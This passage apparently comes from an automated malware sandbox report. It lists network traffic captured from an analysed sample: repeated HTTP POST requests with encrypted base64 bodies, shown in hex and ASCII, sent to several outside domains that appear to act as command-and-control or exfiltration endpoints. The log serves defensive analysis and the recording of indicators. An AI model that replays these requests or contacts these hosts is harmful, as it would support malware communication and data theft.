2f 52 74 66 74 61 42 69 75 70 6c 57 69 37 7a 54 65 37 2b 55 67 4e 4b 33 74 43 4a 30 43 70 44 7a 34 51 77 57 6f 38 77 70 4f 6e 4c 58 36 59 6a 46 58 46 48 57 6c 79 49 68 36 66 72 6b 39 34 59 57 7a 5a 43 72 71 4f 4d 52 31 6a 68 37 65 4a 57 78 73 57 55 4c 31 6a 62 43 74 46 33 39 34 30 49 6c 64 70 75 38 62 4c 6b 7a 62 54 4d 30 79 66 4e 59 4e 48 44 47 49 65 69 6f 42 50 39 74 62 77 2f 6f 4a 37 48 6b 46 6b 34 42 4a 30 67 6e 58 6e 44 73 52 75 66 44 5a 59 45 50 79 35 61 49 53 6a 64 62 52 70 51 32 46 34 41 48 58 39 68 49 69 69 71 62 57 38 66 6c 55 6c 6e 33 6c 6d 76 79 71 77 72 6b 49 75 45 34 56 4b 6c 41 7a 69 4c 76 47 78 42 6c 32 58 50 5a 75 36 6d 69 41 6e 58 66 35 57 32 4a 58 34 79 59 47 7a 2f 4c 32 4b 48 63 77 3d Data Ascii: euoa50mhe5Z9B4yAmDoa42Lc2+Nn2N8gjSgJQmlNsHR4Vn3erCb3Q7XQfKVu0j4KFPsJOYmi7cwysgRHCOUmu0zoEPBeEeaIxJYzI35ylJTX5yTX2AaK4cKy2jc/YP2wjcm2RZQv+yEtfKt88NVFiF6rQdqYDLnDebPrPeCIUxr0LYVN58zxtkcfUY/n10tlOZiXkjZjiGcl/D/GR7XLnaFGGo4WvkzWrTH3bV3Fud3T7pkmurJFR/zFooDMr+b975dy1kQXHKyoRnVWbLVzWYPJrTBJd81Ic5shNae8hOCHWWsho7KDpTvqbatkQa/RtftaBiuplWi7zTe7+UgNK3tCJ0CpDz4QwWo8wpOnLX6YjFXFHWlyIh6frk94YWzZCrqOMR1jh7eJWxsWUL1jbCtF3940Ildpu8bLkzbTM0yfNYNHDGIeioBP9tbw/oJ7HkFk4BJ0gnXnDsRufDZYEPy5aISjdbRpQ2F4AHX9hIiiqbW8flUln3lmvyqwrkIuE4VKlAziLvGxBl2XPZu6miAnXf5W2JX4yYGz/L2KHcw=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 4d 76 68 6d 35 6e 47 62 65 35 59 4a 4c 2f 58 7a 6b 4e 36 74 54 73 70 67 66 6a 4b 76 73 51 6e 4f 4e 66 47 6f 34 52 6a 53 45 59 59 31 53 51 67 4c 65 34 4c 53 62 4f 55 68 72 39 63 67 45 42 52 53 73 63 37 36 67 2b 41 43 42 67 41 53 2f 44 37 6a 6e 33 48 51 70 64 6d 41 36 44 76 37 59 52 30 4a 6e 69 6b 56 56 78 2b 6e 4a 4e 47 32 74 5a 79 6e 30 45 61 41 2f 44 6d 37 51 56 36 68 36 43 52 65 61 48 49 54 42 38 5a 59 6f 6e 55 51 6b 41 42 4a 50 55 59 51 50 56 52 47 57 45 50 67 37 44 46 66 72 73 74 59 74 70 52 44 73 41 44 4e 38 2b 67 4a 7a 30 48 2b 64 36 31 70 78 61 39 78 78 57 6b 57 6f 76 76 30 5a 45 38 73 67 76 33 77 31 66 73 79 53 35 38 4d 45 48 6a 7a 67 54 54 45 7a 53 48 6e 59 4e 53 35 79 79 42 32 59 71 64 47 76 2f 6e 5a 31 31 6f 2b 70 7a 48 35 58 74 41 33 70 33 67 53 42 33 55 77 66 69 42 50 68 74 6e 6e 64 50 59 54 38 41 79 70 5a 32 58 67 67 32 42 4b 4c 6b 68 32 6e 73 52 39 6f 48 54 4e 34 48 62 53 5a 66 33 7a 79 73 74 66 38 57 71 61 69 4d 45 5a 56 77 65 6b 52 79 2f 30 47 7a 30 47 32 4a 2f 54 36 63 7a 55 46 44 41 6a 31 4f 31 47 63 70 31 36 66 65 32 66 34 58 38 2b 69 6c 79 4e 51 6a 46 76 73 52 6a 73 4c 53 65 31 5a 59 33 4a 6c 4b 4a 43 57 36 62 4e 53 32 45 4b 6f 54 6d 51 4a 56 72 72 71 6c 73 42 76 50 61 36 6a 77 43 32 33 65 72 4c 41 68 69 68 6b 70 48 4c 6a 38 68 6b 36 67 31 33 62 6d 75 4f 57 6a 54 34 6a 68 4a 68 4c 65 46 50 6f 39 66 7a 74 36 38 57 77 33 59 6a 4f 35 4a 47 64 47 6f 79 67 6b 36 4f 68 4c 38 47 2f 6e 6d 66 78 65 4a 56 6a 67 45 39 68 31 57 79 7a 2b 6a 55 61 54 61 51 47 38 6c 44 73 63 6f 54 70 4a 4d 49 55 7a 6e 4d 4d 4b 4b 70 6a 64 47 31 6a 4b 7a 50 65 6a 4b 6e 35 37 39 4c 41 34 64 69 50 6b 69 42 52 44 34 34 6c 4c 45 75 6e 77 3d 3d Data Ascii: Mvhm5nGbe5YJL/XzkN6tTspgfjKvsQnONfGo4RjSEYY1SQgLe4LSbOUhr9cgEBRSsc76g+ACBgAS/D7jn3HQpdmA6Dv7YR0JnikVVx+nJNG2tZyn0EaA/Dm7QV6h6CReaHITB8ZYonUQkABJPUYQPVRGWEPg7DFfrstYtpRDsADN8+gJz0H+d61pxa9xxWkWovv0ZE8sgv3w1fsyS58MEHjzgTTEzSHnYNS5yyB2YqdGv/nZ11o+pzH5XtA3p3gSB3UwfiBPhtnndPYT8AypZ2Xgg2BKLkh2nsR9oHTN4HbSZf3zystf8WqaiMEZVwekRy/0Gz0G2J/T6czUFDAj1O1Gcp16fe2f4X8+ilyNQjFvsRjsLSe1ZY3JlKJCW6bNS2EKoTmQJVrrqlsBvPa6jwC23erLAhihkpHLj8hk6g13bmuOWjT4jhJhLeFPo9fzt68Ww3YjO5JGdGoygk6OhL8G/nmfxeJVjgE9h1Wyz+jUaTaQG8lDscoTpJMIUznMMKKpjdG1jKzPejKn579LA4diPkiBRD44lLEunw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 4a 7a 6b 38 74 65 39 53 67 70 62 39 38 59 37 6d 44 6d 4e 76 35 2f 6a 4f 62 68 59 46 2b 67 75 4b 6b 31 47 57 48 58 47 6f 49 41 6a 46 44 6b 50 58 51 71 63 46 6c 31 49 47 71 53 33 36 64 33 64 30 63 54 66 70 36 47 46 41 41 53 6d 77 4b 36 43 79 57 2b 53 71 42 39 41 36 55 68 63 65 6f 4e 78 6c 41 52 45 50 4e 63 67 57 36 41 2b 65 6f 38 6a 67 50 62 39 44 7a 76 37 53 43 30 68 71 46 75 6d 44 6e 66 50 6a 66 33 79 35 2b 54 30 47 38 2f 79 48 44 7a 70 38 77 39 58 79 7a 56 35 71 5a 77 66 62 7a 58 4b 72 4e 73 45 64 71 46 44 34 30 37 6c 6b 71 63 61 49 72 31 63 6f 68 63 4a 4f 69 4d 55 46 4d 4e 65 78 6e 52 4d 52 78 51 2f 39 61 42 67 72 48 74 57 67 48 54 65 35 47 71 38 78 61 7a 6c 78 36 2b 61 71 39 67 39 34 53 4e 75 39 32 66 35 76 39 69 78 51 43 44 73 6b 52 69 42 2f 65 2b 41 50 7a 41 78 78 76 58 65 75 71 32 45 2f 79 6a 71 50 77 50 32 4a 2b 65 61 57 76 39 42 44 70 68 42 33 31 4d 76 5a 66 6d 47 6a 52 44 36 6d 36 67 7a 76 78 36 48 4b 4c 2b 4a 35 50 72 30 4f 79 64 57 75 69 6b 59 34 68 79 41 68 6f 75 74 30 6f 4e 35 33 51 78 5a 4e 6b 2f 4f 6f 4c 46 47 2b 54 4f 57 30 42 6d 49 43 67 72 4e 2f 52 4a 52 44 5a 2b 71 6a 4f 78 4f 63 4a 37 71 4f 79 62 45 76 34 4f 4e 65 58 66 2f 52 54 41 45 4a 66 4b 46 32 51 64 6c 65 4c 62 62 4b 5a 59 63 35 77 74 2f 6a 67 64 47 50 55 45 69 56 4d 66 37 68 6e 69 6b 62 68 4c 6a 52 36 75 52 6c 37 36 61 57 6c 64 65 4f 79 32 2f 70 75 76 6a 6e 2b 6d 56 70 2f 65 57 45 78 53 62 6c 70 53 74 54 50 69 2f 67 56 35 73 45 75 6c 67 41 37 57 64 38 77 6d 2f 6a 6b 46 79 55 47 46 59 2b 76 6a 7a 2f 6a 54 44 49 73 54 62 49 45 65 38 39 61 66 37 4b 4f 49 76 6e 51 51 57 62 41 6a 4c 2b 48 46 42 4c 33 2b 67 51 55 6d 46 48 65 47 37 4b 50 61 37 6b 67 2f 4c 75 65 72 63 41 4f 54 75 6d 50 42 49 45 37 4a 4d 30 56 34 77 58 50 50 67 3d Data Ascii: Jzk8te9Sgpb98Y7mDmNv5/jObhYF+guKk1GWHXGoIAjFDkPXQqcFl1IGqS36d3d0cTfp6GFAASmwK6CyW+SqB9A6UhceoNxlAREPNcgW6A+eo8jgPb9Dzv7SC0hqFumDnfPjf3y5+T0G8/yHDzp8w9XyzV5qZwfbzXKrNsEdqFD407lkqcaIr1cohcJOiMUFMNexnRMRxQ/9aBgrHtWgHTe5Gq8xazlx6+aq9g94SNu92f5v9ixQCDskRiB/e+APzAxxvXeuq2E/yjqPwP2J+eaWv9BDphB31MvZfmGjRD6m6gzvx6HKL+J5Pr0OydWuikY4hyAhout0oN53QxZNk/OoLFG+TOW0BmICgrN/RJRDZ+qjOxOcJ7qOybEv4ONeXf/RTAEJfKF2QdleLbbKZYc5wt/jgdGPUEiVMf7hnikbhLjR6uRl76aWldeOy2/puvjn+mVp/eWExSblpStTPi/gV5sEulgA7Wd8wm/jkFyUGFY+vjz/jTDIsTbIEe89af7KOIvnQQWbAjL+HFBL3+gQUmFHeG7KPa7kg/LuercAOTumPBIE7JM0V4wXPPg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 62 58 62 33 63 76 38 72 67 4a 61 42 2f 37 55 35 33 73 6c 66 50 6f 6a 61 68 44 70 56 34 4e 56 49 6f 2f 50 4d 55 32 32 49 46 55 61 68 66 42 46 69 65 71 79 58 41 43 7a 42 50 76 62 69 34 71 59 6b 53 46 61 70 70 37 65 30 4b 48 45 53 58 67 75 77 36 75 43 31 69 48 37 48 2b 78 73 7a 68 43 6e 6e 57 44 78 78 48 58 6c 4d 57 66 6c 34 6d 67 4f 41 4f 43 6b 68 49 41 75 41 45 76 35 6d 31 4d 55 31 71 4f 45 6c 6a 73 6c 2f 4b 43 2f 37 67 53 51 77 56 64 52 69 4c 6b 69 32 57 6d 36 7a 4d 73 57 67 45 33 63 46 43 4a 50 52 6f 62 33 73 7a 4c 34 57 62 6e 6a 69 78 45 67 43 32 53 68 4f 62 73 36 6c 43 34 75 66 4d 47 68 64 63 74 67 45 66 41 36 4a 59 77 67 33 31 55 73 53 30 45 37 5a 44 66 66 72 73 74 77 51 68 64 48 78 31 79 30 38 5a 74 57 5a 44 56 49 30 62 78 59 57 57 43 75 45 69 45 55 2f 70 38 39 46 71 4e 36 53 4c 76 63 78 4b 32 51 31 4e 45 42 2f 4b 59 62 46 46 5a 68 34 42 54 39 4a 69 59 59 6d 4f 4d 44 63 55 77 4f 6d 75 53 63 47 42 34 4b 4e 74 2b 76 38 51 4e 62 32 50 37 61 44 33 48 72 72 71 73 31 61 77 58 77 6e 69 6d 30 44 59 34 55 42 47 53 74 5a 35 74 75 66 34 31 44 64 37 45 73 70 57 56 76 59 73 34 78 35 79 54 50 53 4c 72 7a 71 4b 35 63 59 4a 76 69 78 45 70 45 51 6a 79 69 34 4a 48 65 46 31 52 4e 78 5a 6d 50 6b 4d 62 32 67 4e 53 56 4f 35 31 32 4d 67 53 44 51 66 79 79 6c 57 2f 66 6b 37 62 37 57 38 30 38 5a 6a 61 44 36 74 76 66 4f 31 30 66 37 59 34 5a 43 65 78 6d 76 68 76 75 6c 6f 45 35 34 74 55 53 56 4c 44 4c 47 54 47 75 46 49 61 58 35 4f 70 7a 66 44 71 75 31 52 42 79 75 79 73 6e 44 64 6f 59 52 31 5a 73 6c 76 51 38 4c 68 4b 7a 50 30 7a 44 36 77 67 67 36 49 35 4b 65 31 6a 50 59 47 37 65 54 55 56 59 67 72 73 34 36 69 35 64 35 6c 32 72 6e 71 49 2f 41 Data Ascii: bXb3cv8rgJaB/7U53slfPojahDpV4NVIo/PMU22IFUahfBFieqyXACzBPvbi4qYkSFapp7e0KHESXguw6uC1iH7H+xszhCnnWDxxHXlMWfl4mgOAOCkhIAuAEv5m1MU1qOEljsl/KC/7gSQwVdRiLki2Wm6zMsWgE3cFCJPRob3szL4WbnjixEgC2ShObs6lC4ufMGhdctgEfA6JYwg31UsS0E7ZDffrstwQhdHx1y08ZtWZDVI0bxYWWCuEiEU/p89FqN6SLvcxK2Q1NEB/KYbFFZh4BT9JiYYmOMDcUwOmuScGB4KNt+v8QNb2P7aD3Hrrqs1awXwnim0DY4UBGStZ5tuf41Dd7EspWVvYs4x5yTPSLrzqK5cYJvixEpEQjyi4JHeF1RNxZmPkMb2gNSVO512MgSDQfyylW/fk7b7W808ZjaD6tvfO10f7Y4ZCexmvhvuloE54tUSVLDLGTGuFIaX5OpzfDqu1RByuysnDdoYR1ZslvQ8LhKzP0zD6wgg6I5Ke1jPYG7eTUVYgrs46i5d5l2rnqI/A
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 65 44 75 56 36 2f 31 6d 6a 4a 5a 71 34 30 55 6c 74 50 78 4e 34 54 59 51 57 32 45 72 6f 71 38 2b 67 56 63 43 4e 43 46 69 76 46 37 63 30 77 62 72 47 77 42 46 72 4d 77 4c 47 6b 62 32 65 55 54 6e 75 62 44 31 78 43 36 78 46 33 5a 65 57 6c 49 6a 73 59 55 45 43 4d 42 4b 70 56 7a 75 6f 6f 79 75 79 54 4b 79 54 46 42 35 66 61 6f 49 6c 7a 57 61 69 73 71 38 57 36 56 69 46 52 45 77 49 32 6d 65 33 6b 6f 38 66 50 72 77 78 35 34 78 64 37 6f 44 65 44 6d 72 32 53 69 50 37 73 67 49 41 66 30 74 38 44 45 78 31 38 46 63 65 61 4e 2f 41 41 2f 37 61 45 73 6d 41 4e 49 35 52 49 6a 5a 34 64 4e 46 64 39 6b 51 55 36 32 72 33 61 5a 49 61 78 64 38 42 37 55 74 6b 36 33 57 6b 79 67 6f 74 68 6d 79 4f 42 70 4c 6f 56 77 51 59 70 30 43 53 69 35 4c 54 65 78 4b 5a 7a 51 6f 58 59 30 36 62 7a 79 49 37 5a 4d 69 75 57 41 30 77 5a 33 58 31 6e 67 35 36 55 2f 66 76 41 45 37 4b 77 39 2f 6a 62 62 30 72 70 53 73 34 62 6b 2f 77 6f 35 31 57 4c 6e 6e 62 6d 6c 64 42 6a 36 71 53 65 61 61 32 69 63 6e 32 2f 32 74 41 31 5a 4e 44 59 4e 36 4c 6d 30 56 35 36 41 2f 44 7a 6f 4e 2f 33 31 2b 49 74 4d 69 2f 43 75 30 30 5a 67 69 65 6f 5a 47 52 7a 53 65 54 73 78 31 38 51 36 37 6c 72 51 64 46 6b 44 4c 54 33 2f 4a 6d 32 33 58 37 6d 56 79 52 65 74 67 48 33 39 6d 4c 66 34 77 56 43 75 63 56 31 4f 79 45 49 34 34 75 37 4c 4b 67 45 6b 65 36 6e 53 78 4d 54 35 76 62 36 66 4e 4c 64 61 39 30 79 35 41 75 38 49 2b 77 64 36 61 73 61 77 32 56 42 69 4e 78 69 51 2f 70 32 67 33 70 50 4d 62 6f 6d 74 6b 59 30 77 76 44 47 49 68 5a 64 44 31 4b 49 47 31 51 4f 64 68 2f 64 4d 63 72 48 50 47 66 37 67 64 45 73 4b 4c 6e 31 64 6a 67 76 4a 4c 70 49 46 59 63 2b 4b 70 57 55 34 48 54 51 4a 52 74 43 30 6f 37 30 69 39 66 4c 54 39 2f 39 32 6c 33 61 36 33 68 35 58 44 6a 31 4f 41 48 4c 2f 45 68 31 33 69 65 7a 61 6b 79 67 3d 3d Data Ascii: eDuV6/1mjJZq40UltPxN4TYQW2Eroq8+gVcCNCFivF7c0wbrGwBFrMwLGkb2eUTnubD1xC6xF3ZeWlIjsYUECMBKpVzuooyuyTKyTFB5faoIlzWaisq8W6ViFREwI2me3ko8fPrwx54xd7oDeDmr2SiP7sgIAf0t8DEx18FceaN/AA/7aEsmANI5RIjZ4dNFd9kQU62r3aZIaxd8B7Utk63WkygothmyOBpLoVwQYp0CSi5LTexKZzQoXY06bzyI7ZMiuWA0wZ3X1ng56U/fvAE7Kw9/jbb0rpSs4bk/wo51WLnnbmldBj6qSeaa2icn2/2tA1ZNDYN6Lm0V56A/DzoN/31+ItMi/Cu00ZgieoZGRzSeTsx18Q67lrQdFkDLT3/Jm23X7mVyRetgH39mLf4wVCucV1OyEI44u7LKgEke6nSxMT5vb6fNLda90y5Au8I+wd6asaw2VBiNxiQ/p2g3pPMbomtkY0wvDGIhZdD1KIG1QOdh/dMcrHPGf7gdEsKLn1djgvJLpIFYc+KpWU4HTQJRtC0o70i9fLT9/92l3a63h5XDj1OAHL/Eh13iezakyg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 46 54 47 53 37 44 52 76 6a 4a 62 4f 65 73 79 7a 6a 31 48 7a 73 59 64 41 58 43 45 73 30 4c 55 76 71 4a 39 77 44 4b 54 6d 66 39 4f 76 31 71 4b 2f 62 45 36 74 58 63 70 65 71 43 2b 4f 6c 79 4f 52 47 76 47 4f 44 6a 33 71 6d 52 39 6f 57 51 76 38 45 49 67 36 68 32 58 51 49 51 6e 4d 4e 6b 65 53 66 73 61 57 64 6d 2f 6c 46 4f 36 6b 6f 6b 31 4b 41 50 54 68 2f 43 6e 67 6e 6b 59 36 65 78 2b 7a 45 47 71 79 4f 7a 36 70 47 31 33 69 66 72 30 74 70 4f 42 4a 33 42 54 6d 4e 56 4f 41 68 61 62 58 44 72 6a 30 62 49 61 70 67 37 46 45 75 5a 50 53 42 30 52 54 61 4a 32 49 79 6b 45 73 6a 54 47 62 42 72 41 2f 2f 59 51 42 73 2b 33 6a 45 77 4f 43 76 4d 57 77 58 69 54 42 68 59 53 59 75 45 52 73 61 7a 50 4d 64 4a 30 6d 58 46 72 38 73 66 4f 33 4b 53 41 71 47 56 56 69 49 4d 61 63 45 50 2b 55 48 30 59 6b 6f 6a 61 75 5a 74 47 59 67 6e 7a 4d 72 41 59 6c 57 74 42 68 4d 73 76 6f 6e 75 58 2f 45 46 67 6f 4a 4e 53 49 75 74 58 71 4f 57 6e 7a 4a 7a 66 36 33 4b 64 38 48 78 34 32 71 7a 75 77 36 73 4b 2f 43 59 61 5a 4f 37 70 71 73 44 6f 71 75 78 4f 46 37 6b 69 6d 69 73 33 31 64 30 4a 2b 35 49 51 70 76 78 2b 6a 4b 50 75 7a 55 44 68 71 68 38 32 6c 4d 50 32 48 77 50 6d 58 4a 6a 51 38 4e 73 47 48 54 59 73 62 64 2f 39 30 73 51 6d 39 56 7a 55 4e 74 49 2f 43 4f 31 53 49 4a 55 64 53 44 56 76 42 55 4e 2b 74 4a 54 6d 4a 58 46 58 2f 46 39 69 41 52 63 4a 55 49 70 79 5a 4b 6e 62 38 59 2f 4c 77 79 56 48 46 59 33 6f 5a 79 4d 73 67 30 4d 46 68 61 64 53 65 70 42 34 67 48 50 37 48 59 33 74 6f 34 31 70 6d 2f 6a 45 4f 59 38 47 46 6f 6d 50 55 2f 61 2f 6a 79 39 64 63 32 76 68 34 37 31 2f 48 47 70 72 46 58 62 75 57 70 46 78 4b 79 6f 51 58 72 58 45 55 5a 66 33 53 70 49 75 4a 66 44 61 46 76 6b 36 4b 30 71 7a 37 48 51 3d 3d Data Ascii: FTGS7DRvjJbOesyzj1HzsYdAXCEs0LUvqJ9wDKTmf9Ov1qK/bE6tXcpeqC+OlyORGvGODj3qmR9oWQv8EIg6h2XQIQnMNkeSfsaWdm/lFO6kok1KAPTh/CngnkY6ex+zEGqyOz6pG13ifr0tpOBJ3BTmNVOAhabXDrj0bIapg7FEuZPSB0RTaJ2IykEsjTGbBrA//YQBs+3jEwOCvMWwXiTBhYSYuERsazPMdJ0mXFr8sfO3KSAqGVViIMacEP+UH0YkojauZtGYgnzMrAYlWtBhMsvonuX/EFgoJNSIutXqOWnzJzf63Kd8Hx42qzuw6sK/CYaZO7pqsDoquxOF7kimis31d0J+5IQpvx+jKPuzUDhqh82lMP2HwPmXJjQ8NsGHTYsbd/90sQm9VzUNtI/CO1SIJUdSDVvBUN+tJTmJXFX/F9iARcJUIpyZKnb8Y/LwyVHFY3oZyMsg0MFhadSepB4gHP7HY3to41pm/jEOY8GFomPU/a/jy9dc2vh471/HGprFXbuWpFxKyoQXrXEUZf3SpIuJfDaFvk6K0qz7HQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 41 68 6c 53 61 70 65 45 6b 4a 61 65 55 4a 47 4e 68 74 6c 59 61 65 44 32 5a 53 37 4e 59 43 63 68 75 77 6e 58 56 4e 78 66 4e 5a 62 31 7a 34 58 46 39 6f 37 38 4e 77 33 56 33 38 69 56 62 73 6c 52 56 43 6c 45 55 50 53 75 32 34 5a 37 77 41 65 75 2f 38 45 41 47 2b 6f 56 4a 41 4f 2b 49 73 45 68 68 6b 6e 41 49 31 55 56 73 6a 64 39 6c 4a 63 33 59 6f 33 46 4b 37 49 5a 46 75 59 55 4b 4f 41 54 59 58 68 6d 41 79 78 7a 77 73 54 48 2b 65 48 54 4e 4d 31 78 58 31 55 58 77 50 4e 64 59 62 74 6d 59 6f 5a 61 59 70 53 4b 32 69 45 33 53 53 55 6e 49 4d 70 56 70 58 47 2b 66 51 74 4f 45 67 59 59 56 66 4f 62 53 4e 53 2b 34 42 4f 57 38 48 36 31 4d 43 38 67 35 54 69 34 73 53 53 74 67 4a 65 6a 50 59 38 32 59 39 72 35 4f 65 52 31 32 67 58 46 6c 45 42 4e 36 69 37 56 55 72 36 68 4c 69 4e 6b 38 4f 57 37 34 65 65 2f 69 34 50 71 42 57 77 48 78 5a 6e 4d 64 45 4e 50 4e 77 33 36 53 7a 52 55 49 55 31 4f 65 55 42 43 77 46 32 6e 39 6f 6d 64 48 37 56 2b 38 45 61 2f 2b 34 35 68 4e 79 37 79 41 4b 53 31 62 74 4d 41 68 31 76 59 41 35 62 39 58 7a 69 46 4e 6d 6d 69 44 46 38 63 63 55 5a 34 4c 44 59 66 6f 50 6c 32 52 33 6e 54 69 34 6e 30 39 6d 33 4e 68 69 46 78 45 6b 6c 41 31 6f 6d 68 65 78 36 6a 45 34 73 71 52 42 65 4d 37 4c 73 4a 78 38 67 62 43 41 68 43 74 32 75 39 4f 32 74 63 53 43 44 54 2b 33 34 31 2b 4a 79 7a 63 76 64 51 77 30 38 61 35 33 6e 38 61 45 48 6a 55 4e 44 30 31 41 6e 38 5a 59 4f 73 30 71 6f 65 38 70 30 57 35 4a 6e 45 36 4f 69 31 33 4e 34 76 57 4b 2f 52 35 73 54 71 2b 48 61 52 49 72 74 4a 76 42 63 41 51 61 7a 2f 6d 33 76 51 67 53 55 6d 63 38 67 69 2b 61 58 57 32 78 77 57 43 69 75 61 6f 4e 54 42 66 64 75 57 71 6f 6e 75 46 7a 36 36 6f 68 41 4a 34 58 38 4d 71 77 6f 4e 41 50 74 37 55 74 38 69 Data Ascii: AhlSapeEkJaeUJGNhtlYaeD2ZS7NYCchuwnXVNxfNZb1z4XF9o78Nw3V38iVbslRVClEUPSu24Z7wAeu/8EAG+oVJAO+IsEhhknAI1UVsjd9lJc3Yo3FK7IZFuYUKOATYXhmAyxzwsTH+eHTNM1xX1UXwPNdYbtmYoZaYpSK2iE3SSUnIMpVpXG+fQtOEgYYVfObSNS+4BOW8H61MC8g5Ti4sSStgJejPY82Y9r5OeR12gXFlEBN6i7VUr6hLiNk8OW74ee/i4PqBWwHxZnMdENPNw36SzRUIU1OeUBCwF2n9omdH7V+8Ea/+45hNy7yAKS1btMAh1vYA5b9XziFNmmiDF8ccUZ4LDYfoPl2R3nTi4n09m3NhiFxEklA1omhex6jE4sqRBeM7LsJx8gbCAhCt2u9O2tcSCDT+341+JyzcvdQw08a53n8aEHjUND01An8ZYOs0qoe8p0W5JnE6Oi13N4vWK/R5sTq+HaRIrtJvBcAQaz/m3vQgSUmc8gi+aXW2xwWCiuaoNTBfduWqonuFz66ohAJ4X8MqwoNAPt7Ut8i
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 65 44 75 56 36 2f 31 6d 6a 4a 5a 71 34 30 55 6c 74 50 78 4e 34 54 59 51 57 32 45 72 6f 71 38 2b 67 56 63 43 4e 43 46 69 76 46 37 63 30 77 62 72 47 77 42 46 72 4d 77 4c 47 6b 62 32 65 55 54 6e 75 62 44 31 78 43 36 78 46 33 5a 65 57 6c 49 6a 73 59 55 45 43 4d 42 4b 70 56 7a 75 6f 6f 79 75 79 54 4b 79 54 46 42 35 66 61 6f 49 6c 7a 57 61 69 73 71 38 57 36 56 69 46 52 45 77 49 32 6d 65 33 6b 6f 38 66 50 72 77 78 35 34 78 64 37 6f 44 65 44 6d 72 32 53 69 50 37 73 67 49 41 66 30 74 38 44 45 78 31 38 46 63 65 61 4e 2f 41 41 2f 37 61 45 73 6d 41 4e 49 35 52 49 6a 5a 34 64 4e 46 64 39 6b 51 55 36 32 72 33 61 5a 49 61 78 64 38 42 37 55 74 6b 36 33 57 6b 79 67 6f 74 68 6d 79 4f 42 70 4c 6f 56 77 51 59 70 30 43 53 69 35 4c 54 65 78 4b 5a 7a 51 6f 58 59 30 36 62 7a 79 49 37 5a 4d 69 75 57 41 30 77 5a 33 58 31 6e 67 35 36 55 2f 66 76 41 45 37 4b 77 39 2f 6a 62 62 30 72 70 53 73 34 62 6b 2f 77 6f 35 31 57 4c 6e 6e 62 6d 6c 64 42 6a 36 71 53 65 61 61 32 69 63 6e 32 2f 32 74 41 31 5a 4e 44 59 4e 36 4c 6d 30 56 35 36 41 2f 44 7a 6f 4e 2f 33 31 2b 49 74 4d 69 2f 43 75 30 30 5a 67 69 65 6f 5a 47 52 7a 53 65 54 73 78 31 38 51 36 37 6c 72 51 64 46 6b 44 4c 54 33 2f 4a 6d 32 33 58 37 6d 56 79 52 65 74 67 48 33 39 6d 4c 66 34 77 56 43 75 63 56 31 4f 79 45 49 34 34 75 37 4c 4b 67 45 6b 65 36 6e 53 78 4d 54 35 76 62 36 66 4e 4c 64 61 39 30 79 35 41 75 38 49 2b 77 64 36 61 73 61 77 32 56 42 69 4e 78 69 51 2f 70 32 67 33 70 50 4d 62 6f 6d 74 6b 59 30 77 76 44 47 49 68 5a 64 44 31 4b 49 47 31 51 4f 64 68 2f 64 4d 63 72 48 50 47 66 37 67 64 45 73 4b 4c 6e 31 64 6a 67 76 4a 4c 70 49 46 59 63 2b 4b 70 57 55 34 48 54 51 4a 52 74 43 30 6f 37 30 69 39 66 4c 54 39 2f 39 32 6c 33 61 36 33 68 35 58 44 6a 31 4f 41 48 4c 2f 45 68 31 33 69 65 7a 61 6b 79 67 3d 3d Data Ascii: eDuV6/1mjJZq40UltPxN4TYQW2Eroq8+gVcCNCFivF7c0wbrGwBFrMwLGkb2eUTnubD1xC6xF3ZeWlIjsYUECMBKpVzuooyuyTKyTFB5faoIlzWaisq8W6ViFREwI2me3ko8fPrwx54xd7oDeDmr2SiP7sgIAf0t8DEx18FceaN/AA/7aEsmANI5RIjZ4dNFd9kQU62r3aZIaxd8B7Utk63WkygothmyOBpLoVwQYp0CSi5LTexKZzQoXY06bzyI7ZMiuWA0wZ3X1ng56U/fvAE7Kw9/jbb0rpSs4bk/wo51WLnnbmldBj6qSeaa2icn2/2tA1ZNDYN6Lm0V56A/DzoN/31+ItMi/Cu00ZgieoZGRzSeTsx18Q67lrQdFkDLT3/Jm23X7mVyRetgH39mLf4wVCucV1OyEI44u7LKgEke6nSxMT5vb6fNLda90y5Au8I+wd6asaw2VBiNxiQ/p2g3pPMbomtkY0wvDGIhZdD1KIG1QOdh/dMcrHPGf7gdEsKLn1djgvJLpIFYc+KpWU4HTQJRtC0o70i9fLT9/92l3a63h5XDj1OAHL/Eh13iezakyg==
